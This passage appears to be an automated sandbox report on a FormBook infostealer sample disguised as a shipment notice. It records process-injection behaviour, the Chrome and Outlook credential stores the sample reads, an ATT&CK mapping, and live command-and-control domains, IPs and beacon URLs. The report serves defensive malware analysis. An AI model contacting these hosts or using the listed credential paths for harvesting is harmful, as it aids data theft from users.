          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		21
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items3
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830738 Sample: Shipment_notification.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 27 www.amirah.cfd 2->27 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 3 other signatures 2->41 9 Shipment_notification.exe 3 2->9         started        signatures3 process4 file5 25 C:\Users\...\Shipment_notification.exe.log, ASCII 9->25 dropped 55 Injects a PE file into a foreign processes 9->55 13 Shipment_notification.exe 9->13         started        16 Shipment_notification.exe 9->16         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 18 explorer.exe 1 13->18 injected process9 dnsIp10 29 www.locationsbormes.com 45.114.105.2, 49707, 49708, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS China 18->29 31 carcosainvest.com 206.54.190.30, 49699, 49700, 80 WZCOM-US United States 18->31 33 9 other IPs or domains 18->33 43 System process connects to network (likely due to code injection or exploit) 18->43 45 Performs DNS queries to domains with low reputation 18->45 22 control.exe 13 18->22         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 22->47 49 Tries to harvest and steal browser information (history, passwords, etc) 22->49 51 Deletes itself after installation 22->51 53 2 other signatures 22->53

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Shipment_notification.exe39%ReversingLabsWin32.Trojan.Generic
          Shipment_notification.exe43%VirustotalBrowse
          Shipment_notification.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.Shipment_notification.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.searchvity.com/?dn=100%URL Reputationmalware
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sajatypeworks.comz0%URL Reputationsafe
          http://www.fontbureau.comzana0%URL Reputationsafe
          http://www.carterandcone.comn0%URL Reputationsafe
          http://www.ywtxsm.com/rs5b/Pr100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.carterandcone.comx0%URL Reputationsafe
          http://www.searchvity.com/100%URL Reputationmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.zhongyicts.com.cno.0%URL Reputationsafe
          http://www.peramid.xyz/rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA100%Avira URL Cloudmalware
          http://www.zzxiaoyuan.com/rs5b/10%Avira URL Cloudsafe
          http://www.zzxiaoyuan.com/rs5b/0%Avira URL Cloudsafe
          http://www.emagrecarapido.store0%Avira URL Cloudsafe
          http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU100%Avira URL Cloudphishing
          http://www.drkathleensanders.com0%Avira URL Cloudsafe
          http://www.notebook-rucksack.com0%Avira URL Cloudsafe
          http://www.drkathleensanders.com/rs5b/100%Avira URL Cloudmalware
          http://www.rubyidentity.space/rs5b/0%Avira URL Cloudsafe
          http://www.notebook-rucksack.com/rs5b/0%Avira URL Cloudsafe
          http://www.peramid.xyz/rs5b/100%Avira URL Cloudmalware
          http://www.piergitarshoes.com/rs5b/100%Avira URL Cloudmalware
          http://www.amirah.cfd100%Avira URL Cloudphishing
          http://www.amirah.cfd/rs5b/100%Avira URL Cloudmalware
          http://www.starauctioneerspro.com0%Avira URL Cloudsafe
          http://www.ywtxsm.com/rs5b/100%Avira URL Cloudmalware
          http://www.locationsbormes.com/rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/b0%Avira URL Cloudsafe
          http://www.locationsbormes.com0%Avira URL Cloudsafe
          http://www.isabellagambitta.com0%Avira URL Cloudsafe
          http://www.notebook-rucksack.com/rs5b/%0%Avira URL Cloudsafe
          http://www.kaj8tfjcmkn7.xyz/rs5b/Q0%Avira URL Cloudsafe
          http://www.rubyidentity.space0%Avira URL Cloudsafe
          http://www.carcosainvest.com0%Avira URL Cloudsafe
          http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA100%Avira URL Cloudphishing
          http://www.sajatypeworks.com.Y0%Avira URL Cloudsafe
          http://www.zzxiaoyuan.com0%Avira URL Cloudsafe
          http://www.starauctioneerspro.com/rs5b/0%Avira URL Cloudsafe
          http://www.kaj8tfjcmkn7.xyz/rs5b/0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cnv0%Avira URL Cloudsafe
          http://www.kaj8tfjcmkn7.xyz0%Avira URL Cloudsafe
          http://www.emagrecarapido.store/rs5b/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cni90%Avira URL Cloudsafe
          http://www.tcatelier.com0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cnx0%Avira URL Cloudsafe
          http://www.piergitarshoes.com0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cno0%Avira URL Cloudsafe
          http://www.tcatelier.com/rs5b/0%Avira URL Cloudsafe
          http://www.ywtxsm.com0%Avira URL Cloudsafe
          http://www.isabellagambitta.com/rs5b/100%Avira URL Cloudphishing
          http://www.ywtxsm.com/rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA100%Avira URL Cloudmalware
          http://www.peramid.xyz100%Avira URL Cloudmalware
          http://www.53876.world100%Avira URL Cloudmalware
          http://www.drkathleensanders.com/rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA100%Avira URL Cloudmalware
          http://www.53876.world/rs5b/100%Avira URL Cloudmalware
          http://www.locationsbormes.com/rs5b/100%Avira URL Cloudmalware
          http://www.carcosainvest.com/rs5b/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.peramid.xyz
          		198.177.124.57
          		truetrue
            		unknown
            carcosainvest.com
            		206.54.190.30
            		truetrue
              		unknown
              www.piergitarshoes.com
              		199.59.243.223
              		truetrue
                		unknown
                www.isabellagambitta.com
                		185.27.134.217
                		truetrue
                  		unknown
                  www.ywtxsm.com
                  		154.218.155.8
                  		truetrue
                    		unknown
                    www.drkathleensanders.com
                    		66.96.161.158
                    		truetrue
                      		unknown
                      www.locationsbormes.com
                      		45.114.105.2
                      		truetrue
                        		unknown
                        www.emagrecarapido.store
                        		unknown
                        		unknowntrue
                          		unknown
                          www.tcatelier.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.amirah.cfd
                            		unknown
                            		unknowntrue
                              		unknown
                              www.carcosainvest.com
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.piergitarshoes.com/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.peramid.xyz/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.ywtxsm.com/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.peramid.xyz/rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhAtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.drkathleensanders.com/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.locationsbormes.com/rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhAtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhAtrue
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.ywtxsm.com/rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhAtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.drkathleensanders.com/rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhAtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.locationsbormes.com/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.carcosainvest.com/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.starauctioneerspro.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabcontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                  		high
                                  http://www.fontbureau.com/designersGShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=10W12dX.4.drfalse
                                      		high
                                      http://www.fontbureau.com/designers/?Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/bTheShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers?Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.emagrecarapido.storeexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ywtxsm.com/rs5b/Prexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.zzxiaoyuan.com/rs5b/explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zzxiaoyuan.com/rs5b/1explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
